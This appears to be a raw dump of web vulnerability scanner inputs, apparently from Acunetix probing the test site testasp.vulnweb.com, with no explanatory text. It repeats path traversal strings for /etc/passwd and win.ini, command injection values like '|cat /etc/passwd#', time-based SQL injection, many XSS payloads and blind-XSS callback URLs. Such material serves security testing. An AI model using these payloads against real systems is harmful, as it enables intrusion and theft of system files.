..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

|cat /etc/passwd#

^(#$!@#$)(()))******

'"()

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

'|'ld

"

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"|"ld

${@print(md5(acunetix_wvs_security_test))}

1

1

-1

http://hitV9jVoJZ2lu.bxss.me/

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

/etc/passwd

1

-1)

comments

1

1

-1))

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'

http://www.acunetix.tst

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

qYmNI4kz'

1

'"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

b2SzzeW3')

comments/.

1'"()&%<ScRiPt >prompt(948152)</ScRiPt>

"

1

1

<!--

1

1

'"()&%<ScRiPt >prompt(975302)</ScRiPt>

1

CqaKtNby'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

1

1

1_999567

1

-1

&dir

1

1

1

file:///etc/passwd

-1)

'&dir&'

1

1

-1))

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

jrLfJoW4'

1

1

WEB-INF/web.xml

|dir

WJjJ3psk')

1

NhdXlmKL'))

WEB-INF\web.xml

'|dir

acu1294\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1294

1

1

"|dir

acux9598\xc0\xbez1\xc0\xbcz2a\x90bcxuca9598

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(992506)</ScRiPt>

../../../../../../../../../../boot.ini

1

1<script>prompt(916879)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(926402)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?967930></ScRiPt>

1

................windowswin.ini

1<ScRiPt >prompt(946381)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(948528)">

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(934002)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<div style=width:expression(prompt(900422))>

1

1

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<body onload=prompt(951896)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(963079)>

1

1

1<img src=xyz OnErRor=prompt(993196)>

1

1

WEB-INF/web.xml

1

1

1<img/src=">" onerror=alert(909376)>

WEB-INF\web.xml

1

1<ScRiPt%20>prompt(902275)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(991848) //\xf6>

1

1

1<input autofocus onfocus=prompt(972867)>

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_lzLig <ScRiPt >prompt(976057)</ScRiPt>

1

1

1

1

1

1

response.write(9339024*9992394)

1

1

'+response.write(9339024*9992394)+'

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

"+response.write(9339024*9992394)+"

../../../../../../../../../../etc/passwd

${100004+99465}

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'&cat /etc/passwd&'

1&n901341=v979973

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

!(()&&!|*|*|

cat /etc/passwd

'"()

'

testasp.vulnweb.com

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

"

`cat /etc/passwd`

1

^(#$!@#$)(()))******

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

${@print(md5(acunetix_wvs_security_test))}

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

|cat /etc/passwd#

1

http://hitrLeS7rBjzJ.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

acunetix_wvs_invalid_filename

1

1

1

1

1

'|'ld

comments

-1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"|"ld

1

http://www.acunetix.tst

1

1

comments

1

-1)

1

1'"()&%<ScRiPt >prompt(904289)</ScRiPt>

'"

/etc/passwd

-1))

1

comments/.

1

'

1

<!--

'"()&%<ScRiPt >prompt(937306)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

H2uCWBi4'

1

1

1

"

1_921330

jVC6aUhE')

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

dVDlBX90'))

1

&dir

1

-1

1

1

-1)

'&dir&'

file:///etc/passwd

-1))

1

"&dir&"

acu10758\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10758

9DRNuROV'

/\../\../\../\../\../\../\../etc/passwd

|dir

1

acux3315\xc0\xbez1\xc0\xbcz2a\x90bcxuca3315

xPo2mA9U')

WEB-INF/web.xml

1<ScRiPt >prompt(911718)</ScRiPt>

Ik08m9xX'))

1

1<script>prompt(909004)</script>

'|dir

1

WEB-INF\web.xml

1

"|dir

1<ScRiPt >prompt(961325)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954066></ScRiPt>

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(933025)</ScRiPt>

1

response.write(9686794*9884483)

../../../../../../../../../../windows/win.ini.jpg

1

1<video><source onerror="javascript:prompt(942145)">

1

&cat /etc/passwd&

'+response.write(9686794*9884483)+'

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(999372)"></g></svg>

'&cat /etc/passwd&'

"+response.write(9686794*9884483)+"

../../../../../../../../../../etc/passwd

................windowswin.ini

1<div style=width:expression(prompt(979154))>

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(963205)>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935390)>

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

1<img src=xyz OnErRor=prompt(922854)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99964+99299}

|cat /etc/passwd#

1<img/src=">" onerror=alert(981564)>

1

1&n997577=v955502

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(992466)</sCripT>

'|'ld

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

)

1&lt

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"|"ld

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(939016) //\xf6>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

testasp.vulnweb.com

1

^(#$!@#$)(()))******

-1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1<input autofocus onfocus=prompt(959480)>

WEB-INF/web.xml

1

1

1

1

'

-1)

WEB-INF\web.xml

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

1

1

"

1

-1))

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

heihJVhd'

||cat /etc/passwd

1

1

1_HhIJv <ScRiPt >prompt(909257)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

22q3w58y')

'

http://hitzSxgSeY7z0.bxss.me/

acunetix_wvs_invalid_filename

1

1

&dir

1

"

comments

1

9i5GXswO'))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

comments

${@print(md5(acunetix_wvs_security_test))}\

1

-1

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

1

1

|dir

1

1

-1)

1

'"

1

http://www.acunetix.tst

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(904583)</ScRiPt>

1

-1))

'|dir

<!--

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(994217)</ScRiPt>

1

"|dir

1

1

1

1

0RAR9e8c'

1

1_995501

1

WEB-INF/web.xml

1

1

1

cJJav1KG')

1

1

1

1

WEB-INF\web.xml

iwF8QzI5'))

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acu3631\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3631

1

1

acux9476\xc0\xbez1\xc0\xbcz2a\x90bcxuca9476

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(942453)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(951762)</script>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(934698)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9660190*9142601)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969137></ScRiPt>

1

1

'+response.write(9660190*9142601)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(950607)</ScRiPt>

1

"+response.write(9660190*9142601)+"

1

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(993952)">

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952042)"></g></svg>

"&cat /etc/passwd&"

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<div style=width:expression(prompt(930540))>

1

1

WEB-INF\web.xml

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

1

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(940742)>

`cat /etc/passwd`

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(923425)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

${100205+99035}

1

-1

1

1<img src=xyz OnErRor=prompt(950072)>

'|'ld

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img/src=">" onerror=alert(956330)>

1

-1)

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

"|"ld

1<ScRiPt%20>prompt(998709)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n963334=v977969

1

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

1

)

1

testasp.vulnweb.com

1

cNjel7KQ'

1

\xf6<img acu onmouseover=prompt(932429) //\xf6>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

171YK4Xd')

'"()

'

1

1

1<input autofocus onfocus=prompt(960614)>

1

XRbvnMQW'))

^(#$!@#$)(()))******

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

<a href='http://www.acunetix.com'>website security</a>

'

1

1

1

1

-1

1

"

1

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

http://hittaOLe3XLZy.bxss.me/

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1

&dir

1_Vg1Gx <ScRiPt >prompt(925495)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

nGqoFlc4'

1

'"

comments

http://www.acunetix.tst

1

1

1

"&dir&"

ryjEmoDe')

1

<!--

1'"()&%<ScRiPt >prompt(918043)</ScRiPt>

comments/.

ItH7uhE0'))

1

'"()&%<ScRiPt >prompt(901361)</ScRiPt>

1

1

|dir

file:///etc/passwd

1

1

1

1

1

1_950702

'|dir

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1

1

acu2624\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2624

..\..\..\..\..\..\..\..\windows\win.ini

1

response.write(9990969*9678900)

1

acux2391\xc0\xbez1\xc0\xbcz2a\x90bcxuca2391

1

'+response.write(9990969*9678900)+'

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(968359)</ScRiPt>

"+response.write(9990969*9678900)+"

1

1

1

1

1

1<script>prompt(949013)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1

1

1

1<ScRiPt >prompt(962903)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?977843></ScRiPt>

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<ScRiPt >prompt(973233)</ScRiPt>

1

WEB-INF/web.xml

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(999799)">

1

1

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

cat /etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972692)"></g></svg>

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

1<div style=width:expression(prompt(909588))>

${99576+99684}

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<iframe src='data:text/html

1

`cat /etc/passwd`

1

1

1

)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<body onload=prompt(936172)>

1&n994733=v900806

1

1

|cat /etc/passwd#

!(()&&!|*|*|

1some_inexistent_file_with_long_name%00.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969508)>

-1)

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

^(#$!@#$)(()))******

'"()

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1<img src=xyz OnErRor=prompt(910314)>

testasp.vulnweb.com

"|"ld

Ys9daIWN'

1

1

1

1<img/src=">" onerror=alert(901951)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

uiKP1Ksq')

1<ScRiPt%20>prompt(952878)</sCripT>

1

1

a0hZtyWB'))

"

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

-1

1

1

1&lt

'

${@print(md5(acunetix_wvs_security_test))}

-1)

1

http://hitEY50Va8Vfw.bxss.me/

/etc/passwd

1

1

"

${@print(md5(acunetix_wvs_security_test))}\

\xf6<img acu onmouseover=prompt(952697) //\xf6>

acunetix_wvs_invalid_filename

-1))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

IKRith5J'

comments

||cat /etc/passwd

1<input autofocus onfocus=prompt(912628)>

1

1

1

http://www.acunetix.tst

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"

1'"()&%<ScRiPt >prompt(963605)</ScRiPt>

comments

JSf80pSW')

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

<!--

1

1

<a href='http://www.acunetix.com'>website security</a>

4Gjf5WjJ'))

comments/.

'"()&%<ScRiPt >prompt(971829)</ScRiPt>

[url=http://www.acunetix.com]website security[/url]

1

1

'&dir&'

1

1

1_921792

1

1

1_OYhr3 <ScRiPt >prompt(955140)</ScRiPt>

1

1

"&dir&"

1

file:///etc/passwd

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1

"|dir

WEB-INF/web.xml

1

1

1

1

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

acu5447\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5447

../../../../../../../../../../windows/win.ini.jpg

1

1

acux6970\xc0\xbez1\xc0\xbcz2a\x90bcxuca6970

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(915344)</ScRiPt>

1

1

................windowswin.ini

1<script>prompt(950387)</script>

response.write(9601898*9679434)

1

1

1<ScRiPt >prompt(974553)</ScRiPt>

1

1

'+response.write(9601898*9679434)+'

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965162></ScRiPt>

1

1

"+response.write(9601898*9679434)+"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(932734)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(948576)">

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969725)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'&cat /etc/passwd&'

1

1

1

1<div style=width:expression(prompt(913265))>

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

1

${99659+99806}

1<body onload=prompt(925332)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

`cat /etc/passwd`

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917591)>

-1

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

WEB-INF\web.xml

1&n937215=v945263

1

1

1

1<img src=xyz OnErRor=prompt(932048)>

-1)

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

)

-1))

1<img/src=">" onerror=alert(973229)>

1

1

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

KFp1vGoc'

1<ScRiPt%20>prompt(954440)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1&lt

^(#$!@#$)(()))******

lRAUexoY')

'"()

'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

'

0DIhuRrs'))

\xf6<img acu onmouseover=prompt(967369) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

"

1

1

1<input autofocus onfocus=prompt(965098)>

-1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

||cat /etc/passwd

1

/etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1)

acunetix_wvs_invalid_filename

&dir

http://hitgRIle1696D.bxss.me/

[url=http://www.acunetix.com]website security[/url]

1

1

-1))

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

1

1

1_I2uve <ScRiPt >prompt(949010)</ScRiPt>

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

axb5a2MY'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

'"

http://www.acunetix.tst

"&dir&"

1

1

qZZmCZT3')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments/.

|dir

1'"()&%<ScRiPt >prompt(983253)</ScRiPt>

<!--

PxlvrP2n'))

1

1

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(981387)</ScRiPt>

1

1

1

1

file:///etc/passwd

"|dir

1

1

1_973906

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

acu8913\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8913

response.write(9795956*9633808)

acux5493\xc0\xbez1\xc0\xbcz2a\x90bcxuca5493

1

1

1<ScRiPt >prompt(982660)</ScRiPt>

1

'+response.write(9795956*9633808)+'

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(971390)</script>

1

1

"+response.write(9795956*9633808)+"

1

&cat /etc/passwd&

1<ScRiPt >prompt(996251)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

'&cat /etc/passwd&'

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?946397></ScRiPt>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(995764)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<video><source onerror="javascript:prompt(907693)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

cat /etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(913304)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<div style=width:expression(prompt(901012))>

`cat /etc/passwd`

${99551+99259}

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

1

|cat /etc/passwd#

1<iframe src='data:text/html

WEB-INF/web.xml

1

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

1&n967244=v912195
